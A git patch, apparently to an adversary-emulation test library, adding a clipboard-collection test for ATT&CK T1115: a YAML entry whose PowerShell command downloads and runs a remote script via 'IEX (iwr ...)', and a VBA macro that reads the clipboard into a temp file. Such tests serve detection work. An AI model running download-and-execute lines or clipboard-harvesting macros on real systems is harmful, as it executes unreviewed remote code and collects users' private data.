From 5f208eec00ddb74becb66b6649e821cd5a710db9 Mon Sep 17 00:00:00 2001
From: Ama Smuggle Avocados
 <47680420+amasmuggleavocados@users.noreply.github.com>
Date: Thu, 10 Dec 2020 12:03:22 -0500
Subject: [PATCH] Clipboardvba (#1321)

* initial push for T1115 (Collect Clipboard Data via VBA)

* update to registry check

* updates

* updates

* updates

Co-authored-by: avocado <avocados@smuggler.com>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1115/T1115.yaml              | 33 ++++++++++++++++++++++++++-
 atomics/T1115/src/T1115-macrocode.txt | 15 ++++++++++++
 2 files changed, 47 insertions(+), 1 deletion(-)
 create mode 100644 atomics/T1115/src/T1115-macrocode.txt

diff --git a/atomics/T1115/T1115.yaml b/atomics/T1115/T1115.yaml
index 94e940a4..dce7f02a 100644
--- a/atomics/T1115/T1115.yaml
+++ b/atomics/T1115/T1115.yaml
@@ -36,4 +36,35 @@ atomic_tests:
       echo ifconfig | pbcopy
       $(pbpaste)
     name: bash
-
+- name: Collect Clipboard Data via VBA
+  auto_generated_guid: 
+  description: |
+    This module copies the data stored in the user's clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt
+  supported_platforms:
+  - windows
+  input_arguments:
+    ms_product:
+      description: Maldoc application Word
+      type: String
+      default: Word
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Microsoft #{ms_product} must be installed
+    prereq_command: |
+      try {
+        New-Object -COMObject "#{ms_product}.Application" | Out-Null
+        $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+        Stop-Process -Name $process
+        exit 0
+      } catch { exit 1 }
+    get_prereq_command: |
+      Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
+  executor:
+    command: |
+      Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA"
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+      Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard"
+    cleanup_command: |
+      Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt" -ErrorAction Ignore
+    name: powershell
diff --git a/atomics/T1115/src/T1115-macrocode.txt b/atomics/T1115/src/T1115-macrocode.txt
new file mode 100644
index 00000000..879faa5e
--- /dev/null
+++ b/atomics/T1115/src/T1115-macrocode.txt
@@ -0,0 +1,15 @@
+Sub GetClipboard()
+
+  outFile = Environ("TEMP") + "\atomic_T1115_clipboard_data.txt"
+  Set fs = CreateObject("Scripting.FileSystemObject")
+  Set out = fs.CreateTextFile(outFile, True)
+
+  With CreateObject("new:{1C3B4210-F441-11CE-B9EA-00AA006B1A69}")
+    .GetFromClipboard
+    S = .GetText
+  End With
+
+  out.WriteLine (S)
+  out.Close
+  
+End Sub
\ No newline at end of file